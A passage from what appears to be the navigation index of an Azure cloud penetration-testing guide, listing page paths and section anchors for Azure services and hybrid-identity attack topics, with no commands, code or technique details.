ces/az-automation-accounts.html#az---automation-accounts","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#basic-information","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#settings","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#runbooks--jobs","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#schedules--webhooks","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#source-control","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#runtime-environments","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#hybrid-worker-groups","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#state-configuration-sc","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#enumeration","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#privilege-escalation--post-exploitation","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#persistence","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#references","pentesting-cloud/azure-security/az-services/az-app-services.html#az---app-services","pentesting-cloud/azure-security/az-services/az-app-services.html#app-service-basic-information","pentesting-cloud/azure-security/az-services/az-app-services.html#basic-authentication","pentesting-cloud/azure-security/az-services/az-app-services.html#kudu","pentesting-cloud/azure-security/az-services/az-app-services.html#sources","pentesting-cloud/azure-security/az-services/az-app-services.html#webjobs","pentesting-cloud/azure-security/az-services/az-app-services.html#slots","pentesting-cloud/azure-security/az-services/az-app-services.html#azure-function-apps","pentesting-cloud/azure-security/az-services/az-app-services.html#enumeration","pentesting-cloud/azure-security/az-services/az-app-services.html#examples-to-generate-web-apps","pentesting-cloud/azure-security/az-services/az-app-services.html#python-from-local","pentesting-cloud/azure-security/az-services/az-app-services.html#python-from-github","pentesting-cloud/azure-security/az-services/az-app-services.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-app-services.html#references","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#az---cloud-shell","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#azure-cloud-shell","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#key-features","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#cloud-shell-phishing","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#find--forbid-cloud-shell-automatic-storage-accounts","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#persistence","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#references","pentesting-cloud/azure-security/az-services/az-container-registry.html#az---container-registry","pentesting-cloud/azure-security/az-services/az-container-registry.html#basic-information","pentesting-cloud/azure-security/az-services/az-container-registry.html#permissions","pentesting-cloud/azure-security/az-services/az-container-registry.html#authentication","pentesting-cloud/azure-security/az-services/az-container-registry.html#encryption","pentesting-cloud/azure-security/az-services/az-container-registry.html#networking","pentesting-cloud/azure-security/az-services/az-container-registry.html#microsoft-defender-for-cloud","pentesting-cloud/azure-security/az-services/az-container-registry.html#soft-delete","pentesting-cloud/azure-security/az-services/az-container-registry.html#webhooks","pentesting-cloud/azure-security/az-services/az-container-registry.html#connected-registries","pentesting-cloud/azure-security/az-services/az-container-registry.html#runs--tasks","pentesting-cloud/azure-security/az-services/az-container-registry.html#cache","pentesting-cloud/azure-security/az-services/az-container-registry.html#enumeration","pentesting-cloud/azure-security/az-services/az-container-registry.html#unauthenticated-access","pentesting-cloud/azure-security/az-services/az-container-registry.html#privilege-escalation--post-exploitation","pentesting-cloud/azure-security/az-services/az-container-registry.html#references","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#az---container-instances","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#basic-information","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#configurations","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#enumeration","pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#privilege-escalation--post-exploitation","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#az---cosmosdb","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#azure-cosmosdb","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#nosql","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#mongodb","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#references","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#todo","pentesting-cloud/azure-security/az-services/az-defender.html#az---defender","pentesting-cloud/azure-security/az-services/az-defender.html#microsoft-defender-for-cloud","pentesting-cloud/azure-security/az-services/az-defender.html#key-features","pentesting-cloud/azure-security/az-services/az-defender.html#microsoft-defender-easm","pentesting-cloud/azure-security/az-services/az-file-shares.html#az---file-shares","pentesting-cloud/azure-security/az-services/az-file-shares.html#basic-information","pentesting-cloud/azure-security/az-services/az-file-shares.html#access-tiers","pentesting-cloud/azure-security/az-services/az-file-shares.html#backups","pentesting-cloud/azure-security/az-services/az-file-shares.html#supported-authentications-via-smb","pentesting-cloud/azure-security/az-services/az-file-shares.html#supported-authentication-via-nfs","pentesting-cloud/azure-security/az-services/az-file-shares.html#enumeration","pentesting-cloud/azure-security/az-services/az-file-shares.html#connection","pentesting-cloud/azure-security/az-services/az-file-shares.html#regular-storage-enumeration-access-keys-sas","pentesting-cloud/azure-security/az-services/az-file-shares.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-file-shares.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-file-shares.html#persistence","pentesting-cloud/azure-security/az-services/az-front-door.html#az---file-shares","pentesting-cloud/azure-security/az-services/az-front-door.html#remoteaddr-bypass","pentesting-cloud/azure-security/az-services/az-front-door.html#references","pentesting-cloud/azure-security/az-services/az-function-apps.html#az---function-apps","pentesting-cloud/azure-security/az-services/az-function-apps.html#basic-information","pentesting-cloud/azure-security/az-services/az-function-apps.html#different-plans","pentesting-cloud/azure-security/az-services/az-function-apps.html#storage-buckets","pentesting-cloud/azure-security/az-services/az-function-apps.html#networking","pentesting-cloud/azure-security/az-services/az-function-apps.html#function-app-settings--environment-variables","pentesting-cloud/azure-security/az-services/az-function-apps.html#function-sandbox","pentesting-cloud/azure-security/az-services/az-function-apps.html#managed-identities--metadata","pentesting-cloud/azure-security/az-services/az-function-apps.html#access-keys","pentesting-cloud/azure-security/az-services/az-function-apps.html#basic-authentication","pentesting-cloud/azure-security/az-services/az-function-apps.html#github-based-deployments","pentesting-cloud/azure-security/az-services/az-function-apps.html#container-based-deployments","pentesting-cloud/azure-security/az-services/az-function-apps.html#enumeration","pentesting-cloud/azure-security/az-services/az-function-apps.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-function-apps.html#references","pentesting-cloud/azure-security/az-services/intune.html#az---intune","pentesting-cloud/azure-security/az-services/intune.html#basic-information","pentesting-cloud/azure-security/az-services/intune.html#cloud---on-prem","pentesting-cloud/azure-security/az-services/intune.html#references","pentesting-cloud/azure-security/az-services/az-keyvault.html#az---key-vault","pentesting-cloud/azure-security/az-services/az-keyvault.html#basic-information","pentesting-cloud/azure-security/az-services/az-keyvault.html#access-control","pentesting-cloud/azure-security/az-services/az-keyvault.html#key-vault-rbac-built-in-roles","pentesting-cloud/azure-security/az-services/az-keyvault.html#network-access","pentesting-cloud/azure-security/az-services/az-keyvault.html#deletion-protection","pentesting-cloud/azure-security/az-services/az-keyvault.html#enumeration","pentesting-cloud/azure-security/az-services/az-keyvault.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-keyvault.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-logic-apps.html#az---logic-apps","pentesting-cloud/azure-security/az-services/az-logic-apps.html#basic-information","pentesting-cloud/azure-security/az-services/az-logic-apps.html#hosting-options","pentesting-cloud/azure-security/az-services/az-logic-apps.html#single-workflows--consumption-plan","pentesting-cloud/azure-security/az-services/az-logic-apps.html#triggers--actions","pentesting-cloud/azure-security/az-services/az-logic-apps.html#authorization-policies","pentesting-cloud/azure-security/az-services/az-logic-apps.html#access-keys","pentesting-cloud/azure-security/az-services/az-logic-apps.html#workflow-settings--components","pentesting-cloud/azure-security/az-services/az-logic-apps.html#leak-mi-access-tokens","pentesting-cloud/azure-security/az-services/az-logic-apps.html#logic-apps--standard-plan","pentesting-cloud/azure-security/az-services/az-logic-apps.html#differences-with-single-workflows","pentesting-cloud/azure-security/az-services/az-logic-apps.html#enumeration","pentesting-cloud/azure-security/az-services/az-logic-apps.html#integration-accounts","pentesting-cloud/azure-security/az-services/az-logic-apps.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-logic-apps.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-logic-apps.html#persistence","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#az---management-groups-subscriptions--resource-groups","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#management-groups","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#enumeration","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#subscriptions","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#enumeration-1","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#resource-groups","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#enumeration-2","pentesting-cloud/azure-security/az-services/az-misc.html#az---management-groups-subscriptions--resource-groups","pentesting-cloud/azure-security/az-services/az-misc.html#power-apps","pentesting-cloud/azure-security/az-services/az-monitoring.html#az---monitoring","pentesting-cloud/azure-security/az-services/az-monitoring.html#entra-id---logs","pentesting-cloud/azure-security/az-services/az-monitoring.html#entra-id---log-systems","pentesting-cloud/azure-security/az-services/az-monitoring.html#azure-monitor","pentesting-cloud/azure-security/az-services/az-monitoring.html#log-analytics-workspaces","pentesting-cloud/azure-security/az-services/az-monitoring.html#enumeration","pentesting-cloud/azure-security/az-services/az-monitoring.html#entra-id","pentesting-cloud/azure-security/az-services/az-monitoring.html#azure-monitor-1","pentesting-cloud/azure-security/az-services/az-mysql.html#az---mysql-databases","pentesting-cloud/azure-security/az-services/az-mysql.html#azure-mysql","pentesting-cloud/azure-security/az-services/az-mysql.html#security-features","pentesting-cloud/azure-security/az-services/az-mysql.html#enumeration","pentesting-cloud/azure-security/az-services/az-mysql.html#connection","pentesting-cloud/azure-security/az-services/az-mysql.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-mysql.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-mysql.html#todo","pentesting-cloud/azure-security/az-services/az-postgresql.html#az---postgresql-databases","pentesting-cloud/azure-security/az-services/az-postgresql.html#azure-postgresql","pentesting-cloud/azure-security/az-services/az-postgresql.html#key-features","pentesting-cloud/azure-security/az-services/az-postgresql.html#enumeration","pentesting-cloud/azure-security/az-services/az-postgresql.html#connection","pentesting-cloud/azure-security/az-services/az-postgresql.html#references","pentesting-cloud/azure-security/az-services/az-postgresql.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-postgresql.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-postgresql.html#todo","pentesting-cloud/azure-security/az-services/az-queue.html#az---queue-storage","pentesting-cloud/azure-security/az-services/az-queue.html#basic-information","pentesting-cloud/azure-security/az-services/az-queue.html#enumeration","pentesting-cloud/azure-security/az-services/az-queue.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-queue.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-queue.html#persistence","pentesting-cloud/azure-security/az-services/az-queue.html#references","pentesting-cloud/azure-security/az-services/az-sentinel.html#az---defender","pentesting-cloud/azure-security/az-services/az-sentinel.html#microsoft-sentinel","pentesting-cloud/azure-security/az-services/az-sentinel.html#microsoft-sentinel-configuration","pentesting-cloud/azure-security/az-services/az-sentinel.html#main-features","pentesting-cloud/azure-security/az-services/az-servicebus.html#az---service-bus-enum","pentesting-cloud/azure-security/az-services/az-servicebus.html#service-bus","pentesting-cloud/azure-security/az-services/az-servicebus.html#key-concepts","pentesting-cloud/azure-security/az-services/az-servicebus.html#advance-features","pentesting-cloud/azure-security/az-services/az-servicebus.html#local-authentication","pentesting-cloud/azure-security/az-services/az-servicebus.html#authorization-rule--sas-policy","pentesting-cloud/azure-security/az-services/az-servicebus.html#enumeration","pentesting-cloud/azure-security/az-services/az-servicebus.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-servicebus.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-servicebus.html#references","pentesting-cloud/azure-security/az-services/az-sql.html#az---sql","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql","pentesting-cloud/azure-security/az-services/az-sql.html#sql-server-security-features","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql-database","pentesting-cloud/azure-security/az-services/az-sql.html#sql-database-security-features","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql-managed-instance","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql-virtual-machines","pentesting-cloud/azure-security/az-services/az-sql.html#enumeration","pentesting-cloud/azure-security/az-services/az-sql.html#connect-and-run-sql-queries","pentesting-cloud/azure-security/az-services/az-sql.html#references","pentesting-cloud/azure-security/az-services/az-sql.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-sql.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-sql.html#persistence","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#az-static-web-apps","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#static-web-apps-basic-information","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#deployment-authentication","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#web-app-basic-authentication","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#snippets","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#managed-identities","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#enumeration","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#examples-to-generate-web-apps","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#privilege-escalation-and-post-exploitation","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#references","pentesting-cloud/azure-security/az-services/az-storage.html#az---storage-accounts--blobs","pentesting-cloud/azure-security/az-services/az-storage.html#basic-information","pentesting-cloud/azure-security/az-services/az-storage.html#storage-endpoints","pentesting-cloud/azure-security/az-services/az-storage.html#public-exposure","pentesting-cloud/azure-security/az-services/az-storage.html#connect-to-storage","pentesting-cloud/azure-security/az-services/az-storage.html#access-to-storage","pentesting-cloud/azure-security/az-services/az-storage.html#rbac","pentesting-cloud/azure-security/az-services/az-storage.html#access-keys","pentesting-cloud/azure-security/az-services/az-storage.html#shared-keys--lite-shared-keys","pentesting-cloud/azure-security/az-services/az-storage.html#shared-access-signature--sas","pentesting-cloud/azure-security/az-services/az-storage.html#sftp-support-for-azure-blob-storage","pentesting-cloud/azure-security/az-services/az-storage.html#key-features","pentesting-cloud/azure-security/az-services/az-storage.html#setup-requirements","pentesting-cloud/azure-security/az-services/az-storage.html#permissions","pentesting-cloud/azure-security/az-services/az-storage.html#enumeration","pentesting-cloud/azure-security/az-services/az-storage.html#file-shares","pentesting-cloud/azure-security/az-services/az-storage.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-storage.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-storage.html#persistence","pentesting-cloud/azure-security/az-services/az-storage.html#references","pentesting-cloud/azure-security/az-services/az-table-storage.html#az---table-storage","pentesting-cloud/azure-security/az-services/az-table-storage.html#basic-information","pentesting-cloud/azure-security/az-services/az-table-storage.html#keys","pentesting-cloud/azure-security/az-services/az-table-storage.html#enumeration","pentesting-cloud/azure-security/az-services/az-table-storage.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-table-storage.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-table-storage.html#persistence","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#az---virtual-desktop","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#azure-virtual-desktop","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#host-pools","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#session-hosts","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#application-groups","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#workspaces--connections","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#managed-identities","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#enumeration","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#privesc","pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#post-exploitation--persistence","pentesting-cloud/azure-security/az-services/vms/index.html#az---virtual-machines--network","pentesting-cloud/azure-security/az-services/vms/index.html#azure-networking-basic-info","pentesting-cloud/azure-security/az-services/vms/index.html#vms-basic-information","pentesting-cloud/azure-security/az-services/vms/index.html#security-configurations","pentesting-cloud/azure-security/az-services/vms/index.html#disks--snapshots","pentesting-cloud/azure-security/az-services/vms/index.html#images-gallery-images--restore-points","pentesting-cloud/azure-security/az-services/vms/index.html#azure-site-recovery","pentesting-cloud/azure-security/az-services/vms/index.html#azure-bastion","pentesting-cloud/azure-security/az-services/vms/index.html#metadata","pentesting-cloud/azure-security/az-services/vms/index.html#vm-enumeration","pentesting-cloud/azure-security/az-services/vms/index.html#code-execution-in-vms","pentesting-cloud/azure-security/az-services/vms/index.html#vm-extensions","pentesting-cloud/azure-security/az-services/vms/index.html#relevant-vm-extensions","pentesting-cloud/azure-security/az-services/vms/index.html#vm-applications","pentesting-cloud/azure-security/az-services/vms/index.html#user-data","pentesting-cloud/azure-security/az-services/vms/index.html#custom-data","pentesting-cloud/azure-security/az-services/vms/index.html#run-command","pentesting-cloud/azure-security/az-services/vms/index.html#privilege-escalation","pentesting-cloud/azure-security/az-services/vms/index.html#unauthenticated-access","pentesting-cloud/azure-security/az-services/vms/index.html#post-exploitation","pentesting-cloud/azure-security/az-services/vms/index.html#persistence","pentesting-cloud/azure-security/az-services/vms/index.html#references","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#az---azure-network","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#basic-information","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#virtual-network-vnet--subnets","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#network-security-groups-nsg","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-1","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-firewall","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-2","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-route-tables","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-3","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-private-link","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-4","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-service-endpoints","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-5","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#differences-between-service-endpoints-and-private-links","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-front-door-afd--afd-waf","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-6","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-application-gateway-and-azure-application-gateway-waf","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-7","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-hub-spoke--vnet-peering","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-8","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#site-to-site-vpn","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-9","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-expressroute","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-10","pentesting-cloud/azure-security/az-permissions-for-a-pentest.html#az---permissions-for-a-pentest","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#az---lateral-movement-cloud---on-prem","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#basic-information","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#pivoting-techniques","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#az---arc-vulnerable-gpo-deploy-script","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#identifying-the-issues","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#exploit","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-kerberos-trust.html#az---cloud-kerberos-trust","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-kerberos-trust.html#kerberos-trust-relationship-overview","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-kerberos-trust.html#pivoting-from-entra-id-to-on-prem-ad","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-kerberos-trust.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.html#az---cloud-sync","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.html#basic-information","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.html#principals-generated","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.html#password-sychronization","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.html#pivoting","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.html#ad----entra-id","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.html#entra-id----ad","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.html#enumeration","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#az---connect-sync","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#basic-information","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#principals-generated","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#synchronize-passwords","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#password-hash-synchronization","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#password-writeback","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#pivoting-ad----entra-id","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#enumerating-connect-sync","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#finding-the-passwords","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#abusing-msol_","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#abusing-connectsyncprovisioning_connectsync_","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#abusing-sync_-deprecated","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#seamless-sso","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#pivoting-entra-id----ad","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.html#az---microsoft-entra-domain-services","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.html#domain-services","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.html#pivoting","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.html#enumeration","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.html#az---federation","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.html#basic-information","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.html#pivoting","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.html#golden-saml","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.html#on-prem---cloud","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-hybrid-identity-misc-attacks.html#hybrid-identity-miscellaneous-attacks","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-hybrid-identity-misc-attacks.html#forcing-synchronization-of-entra-id-users-to-on-prem","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-hybrid-identity-misc-attacks.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#az---local-cloud-credentials","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#local-token-storage-and-security-considerations","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#azure-cli-command-line-interface","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#azure-powershell","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#automatic-tools-to-find-them","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#tokens-in-memory","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html#az---pass-the-certificate","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html#pass-the-certificate-azure","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#az---pass-the-cookie","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#why-cookies","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#attack","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#az---primary-refresh-token-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#what-is-a-primary-refresh-token-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#how-does-a-prt-work","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#why-are-prts-powerful","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#how-to-know-if-a-prt-is-present","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#pass-the-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#mimikatz","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#mimikatz--aadinternals","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#mimikatz--roadtx","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#abusing-protected-prts","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#user-level-token-theft-non-admin","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#web-account-manager-wam-apis","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#user-impersonation-and-token-retrieval","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#direct-lsass--token-broker-interaction-advanced","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#phishing-prts","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#why-this-works","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#public-tools-and-proof-of-concepts","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.html#az---pta---pass-through-authentication","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.html#basic-information","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.html#authentication-flow","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.html#enumeration","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.html#pivoting","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.html#seamless-sso","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#az---seamless-sso","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#basic-information","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#enumeration","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#pivoting-on-prem---cloud","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#seamlesspass","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#getting-hashes-of-the-azureadss